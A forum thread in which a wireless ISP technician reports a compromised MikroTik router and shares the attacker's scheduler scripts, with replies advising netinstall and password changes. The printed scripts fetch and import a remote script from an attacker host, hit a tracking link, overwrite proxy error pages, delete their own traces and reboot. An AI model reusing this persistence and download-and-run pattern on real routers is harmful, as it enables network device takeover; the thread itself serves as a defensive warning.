Suspect script foun

Hi!

Today I connect to a WISP client equipment and found this scripts in a routerboard:

The user accounts was changed with comment “A mih by prosto vydalyty” and two IP address class was added: 87.246.0.0/16 and 152.237.0.0/16.
/system scheduler
add disabled=yes name=upd112 on-event=“:delay 1m\r
\n:do {/tool fetch url="https://2no.co/184M37\” mode=http keep-result=no} o
n-error={}\r
\n/system scheduler remove [find name=sh113]\r
\n:do {/file remove u113.rsc} on-error={}" policy=
ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=
startup
add disabled=yes interval=12h name=upd113 on-event=“:do {/tool fetch url="http:
//up0.bit:31415/error?part=9" mode=http dst-path=webproxy/error.html} on-e
rror={}\r
\n:do {/tool fetch url="http://up0.bit:31415/error\?part=9\” mode=http dst-
path=flash/webproxy/error.html} on-error={}\r
\n:do {/tool fetch url="http://up0.bit:31415/rsc\?key=9MLcyZzstYRjAa&part=9\
" mode=http dst-path=u113.rsc} on-error={}\r
\n:do {/tool fetch url=https://2no.co/184M37 mode=http keep-result=no} on-er
ror={}\r
\n/import u113.rsc\r
\n:do {/file remove u113.rsc} on-error={}" policy=
ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=
sep/22/2018 start-time=08:06:13
add disabled=yes interval=1d name=Auto113 on-event=
“/system scheduler remove [find name=upd111]\r
\n/system reboot” policy=
ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=
sep/22/2018 start-time=03:11:00

Do a netinstall with the latest version, use a known good config and change all passwords.

the script pointed to a u113.rsc that was in /file and an 113.sh schedule and an udp111 schedule that also seems removed…

the real “bad” stuff happens inside that scripts …

do a netinstall on that device with all user passwords changed and double check your input rules

Thank you guys.

I’ve Posted all here to alert other people to stay alert.

We swapped the equipment, and took this to the workbench to reinstall the firmware.